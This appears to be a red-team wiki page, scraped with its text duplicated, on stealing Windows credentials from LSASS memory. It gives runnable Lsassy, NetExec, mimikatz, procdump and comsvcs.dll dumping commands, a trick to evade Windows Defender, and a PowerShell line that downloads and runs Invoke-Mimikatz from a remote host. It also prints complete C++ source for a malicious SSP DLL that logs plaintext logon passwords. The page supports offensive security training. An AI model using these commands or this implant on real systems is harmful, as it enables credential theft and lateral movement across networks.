LSASS secrets

MITRE ATT&CK™ Sub-technique T1003.001

Theory

The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. LSASS hosts security-related services such as :

AuthN SSPI: An SSPI API, allowing applications to use network security protocols
SAM: Interface for the SAM database.
Vault: Allowing to manage credentials in the Windows Credential Manager.
Audit: Enforced audit policy to generate audit records in the security event log.
Key Isolation: Provides key process isolation to private keys and associated cryptographic operations
EFS: Allow to perform some cryptographic operations for File encryption
DPAPI: Data Protection API Interface for the CryptAPI library, allowing to protect data.

LSASS services are reachable trough RPC

Practice

Dumping LSASS Memory

LSASS operations lead to the storage of credential material in its process memory. With administrative rights only, this material can be harvested (either locally or remotely).

Lsassy (Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.

several dumping methods: comsvcs.dll, ProcDump, Dumpert
several authentication methods: like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
it can be used either as a standalone script, as a NetExec module or as a Python library
it can interact with a Neo4j database to set BloodHound targets as "owned"

# With pass-the-hash (NTLM)
lsassy -u $USER -H $NThash $TARGETS

# With plaintext credentials
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS

# With pass-the-ticket (Kerberos)
lsassy -k $TARGETS

# NetExec Module examples
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
netexec smb $TARGETS -k -M lsassy
netexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd

Mimikatz can be used locally to extract credentials from lsass's process memory, or remotely to analyze a memory dump (dumped with ProcDump for example).

# (Locally) extract credentials from LSASS process memory
sekurlsa::logonpasswords

# (Remotely) analyze a memory dump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

For Windows 2000, a special version of mimikatz called mimilove can be used.

Pypykatz (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with ProcDump for example).

pypykatz lsa minidump lsass.dmp

The legitimate tool ProcDump (from sysinternals) (download) can be used to dump lsass's process memory.

procdump --accepteula -ma lsass lsass.dmp

Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) "bypasses" that.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
procdump -accepteula -ma $lsass_pid lsass.dmp

Once the memory dump is finished, it can be analyzed with mimikatz (Windows) or pypykatz (Python, cross-platform).

The native comsvcs.dll DLL found in C:\Windows\system32 can be used with rundll32 to dump LSASS's process memory.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full

PowerSploit's exfiltration script Invoke-Mimikatz (PowerShell) can be used to extract credential material from LSASS's process memory.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Recovered credential material could be either plaintext passwords or NT hash that can be used with pass the hash (depending on the context).

Security Support Provider DLLs

We may abuse security support providers (SSPs) to injected into LSASS.exe process custom SSP DLLs. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.

We can directly inject SSP DLLs into memory. It prevent us from editing registries but using this approach, it will not persist accross reboot like with this method.

Mimikatz support in memory SSP DLL injection to the LSASS process.

mimikatz# privilege::debug
mimikatz# misc::memssp

Below is the code, originally taken from mimikatz, adapted and refactored, that we can compile as our own Security Support Provider DLL. It intercepts authenticatin details and saves them to a file c:\temp\lsa-pwned.txt:

sspcustom.cpp

#include "stdafx.h"
#define WIN32_NO_STATUS
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <NTSecAPI.h>
#include <ntsecpkg.h>
#include <iostream>
#pragma comment(lib, "Secur32.lib")

NTSTATUS NTAPI SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS Parameters, PLSA_SECPKG_FUNCTION_TABLE FunctionTable) { return 0; }
NTSTATUS NTAPI SpShutDown(void) { return 0; }

NTSTATUS NTAPI SpGetInfo(PSecPkgInfoW PackageInfo)
{
	PackageInfo->Name = (SEC_WCHAR *)L"SSPCustom";
	PackageInfo->Comment = (SEC_WCHAR *)L"SSPCustom <o>";
	PackageInfo->fCapabilities = SECPKG_FLAG_ACCEPT_WIN32_NAME | SECPKG_FLAG_CONNECTION;
	PackageInfo->wRPCID = SECPKG_ID_NONE;
	PackageInfo->cbMaxToken = 0;
	PackageInfo->wVersion = 1;
	return 0;
}

NTSTATUS NTAPI SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, PUNICODE_STRING AccountName, PSECPKG_PRIMARY_CRED PrimaryCredentials, PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials)
{
	HANDLE outFile = CreateFile(L"c:\\temp\\lsa-pwned.txt", FILE_GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	DWORD bytesWritten = 0;
	
	std::wstring log = L"";
	std::wstring account = AccountName->Buffer;
	std::wstring domain = PrimaryCredentials->DomainName.Buffer;
	std::wstring password = PrimaryCredentials->Password.Buffer;

	log.append(account).append(L"@").append(domain).append(L":").append(password).append(L"\n");
	WriteFile(outFile, log.c_str(), log.length() * 2, &bytesWritten, NULL);
	CloseHandle(outFile);
	return 0;
}

SECPKG_FUNCTION_TABLE SecurityPackageFunctionTable[] = 
{
	{
		NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,	SpInitialize, SpShutDown, SpGetInfo, SpAcceptCredentials, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL 
	}
};

// SpLsaModeInitialize is called by LSA for each registered Security Package
extern "C" __declspec(dllexport) NTSTATUS NTAPI SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion, PSECPKG_FUNCTION_TABLE *ppTables, PULONG pcTables)
{
	*PackageVersion = SECPKG_INTERFACE_VERSION;
	*ppTables = SecurityPackageFunctionTable;
	*pcTables = 1;
	return 0;
}

Alternatively, we may modify LSA Registry keys to add new SSPs which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called :

Security Support Provider DLLs

References

LSASS secretsThe Hacker Recipes

Extract credentials from lsass remotelyhackndo

Intercepting Logon Credentials via Custom Security Support Provider and Authentication PackagesRed Team Notes

Last updated 1 year ago

Was this helpful?

Theory

The Local Security Authority Subsystem Service (LSASS) is a Windows service responsible for enforcing the security policy on the system. LSASS hosts security-related services such as :

AuthN SSPI: An SSPI API, allowing applications to use network security protocols

SAM: Interface for the SAM database.

Vault: Allowing to manage credentials in the Windows Credential Manager.

Audit: Enforced audit policy to generate audit records in the security event log.

Key Isolation: Provides key process isolation to private keys and associated cryptographic operations

EFS: Allow to perform some cryptographic operations for File encryption

DPAPI: Data Protection API Interface for the CryptAPI library, allowing to protect data.

LSASS services are reachable trough RPC

Practice

Dumping LSASS Memory

LSASS operations lead to the storage of credential material in its process memory. With administrative rights only, this material can be harvested (either locally or remotely).

Lsassy (Python) can be used to remotely extract credentials, from LSASS, on multiple hosts. As of today (22/07/2020), it is the Rolls-Royce of remote lsass credential harvesting.

several dumping methods: comsvcs.dll, ProcDump, Dumpert
several authentication methods: like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
it can be used either as a standalone script, as a NetExec module or as a Python library
it can interact with a Neo4j database to set BloodHound targets as "owned"

# With pass-the-hash (NTLM)
lsassy -u $USER -H $NThash $TARGETS

# With plaintext credentials
lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS

# With pass-the-ticket (Kerberos)
lsassy -k $TARGETS

# NetExec Module examples
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
netexec smb $TARGETS -k -M lsassy
netexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd

Mimikatz can be used locally to extract credentials from lsass's process memory, or remotely to analyze a memory dump (dumped with ProcDump for example).

# (Locally) extract credentials from LSASS process memory
sekurlsa::logonpasswords

# (Remotely) analyze a memory dump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

For Windows 2000, a special version of mimikatz called mimilove can be used.

Pypykatz (Python) can be used remotely (i.e. offline) to analyze a memory dump (dumped with ProcDump for example).

pypykatz lsa minidump lsass.dmp

The legitimate tool ProcDump (from sysinternals) (download) can be used to dump lsass's process memory.

procdump --accepteula -ma lsass lsass.dmp

Windows Defender is triggered when a memory dump of lsass is operated, quickly leading to the deletion of the dump. Using lsass's process identifier (pid) "bypasses" that.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
procdump -accepteula -ma $lsass_pid lsass.dmp

Once the memory dump is finished, it can be analyzed with mimikatz (Windows) or pypykatz (Python, cross-platform).

The native comsvcs.dll DLL found in C:\Windows\system32 can be used with rundll32 to dump LSASS's process memory.

# Find lsass's pid
tasklist /fi "imagename eq lsass.exe"

# Dump lsass's process memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.dmp full

PowerSploit's exfiltration script Invoke-Mimikatz (PowerShell) can be used to extract credential material from LSASS's process memory.

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds

Recovered credential material could be either plaintext passwords or NT hash that can be used with pass the hash (depending on the context).

Security Support Provider DLLs

We can directly inject SSP DLLs into memory. It prevent us from editing registries but using this approach, it will not persist accross reboot like with this method.

Mimikatz support in memory SSP DLL injection to the LSASS process.

mimikatz# privilege::debug
mimikatz# misc::memssp

sspcustom.cpp

#include "stdafx.h"
#define WIN32_NO_STATUS
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <NTSecAPI.h>
#include <ntsecpkg.h>
#include <iostream>
#pragma comment(lib, "Secur32.lib")

NTSTATUS NTAPI SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS Parameters, PLSA_SECPKG_FUNCTION_TABLE FunctionTable) { return 0; }
NTSTATUS NTAPI SpShutDown(void) { return 0; }

NTSTATUS NTAPI SpGetInfo(PSecPkgInfoW PackageInfo)
{
	PackageInfo->Name = (SEC_WCHAR *)L"SSPCustom";
	PackageInfo->Comment = (SEC_WCHAR *)L"SSPCustom <o>";
	PackageInfo->fCapabilities = SECPKG_FLAG_ACCEPT_WIN32_NAME | SECPKG_FLAG_CONNECTION;
	PackageInfo->wRPCID = SECPKG_ID_NONE;
	PackageInfo->cbMaxToken = 0;
	PackageInfo->wVersion = 1;
	return 0;
}

NTSTATUS NTAPI SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, PUNICODE_STRING AccountName, PSECPKG_PRIMARY_CRED PrimaryCredentials, PSECPKG_SUPPLEMENTAL_CRED SupplementalCredentials)
{
	HANDLE outFile = CreateFile(L"c:\\temp\\lsa-pwned.txt", FILE_GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	DWORD bytesWritten = 0;
	
	std::wstring log = L"";
	std::wstring account = AccountName->Buffer;
	std::wstring domain = PrimaryCredentials->DomainName.Buffer;
	std::wstring password = PrimaryCredentials->Password.Buffer;

	log.append(account).append(L"@").append(domain).append(L":").append(password).append(L"\n");
	WriteFile(outFile, log.c_str(), log.length() * 2, &bytesWritten, NULL);
	CloseHandle(outFile);
	return 0;
}

SECPKG_FUNCTION_TABLE SecurityPackageFunctionTable[] = 
{
	{
		NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,	SpInitialize, SpShutDown, SpGetInfo, SpAcceptCredentials, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL 
	}
};

// SpLsaModeInitialize is called by LSA for each registered Security Package
extern "C" __declspec(dllexport) NTSTATUS NTAPI SpLsaModeInitialize(ULONG LsaVersion, PULONG PackageVersion, PSECPKG_FUNCTION_TABLE *ppTables, PULONG pcTables)
{
	*PackageVersion = SECPKG_INTERFACE_VERSION;
	*ppTables = SecurityPackageFunctionTable;
	*pcTables = 1;
	return 0;
}

Alternatively, we may modify LSA Registry keys to add new SSPs which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called :

Security Support Provider DLLs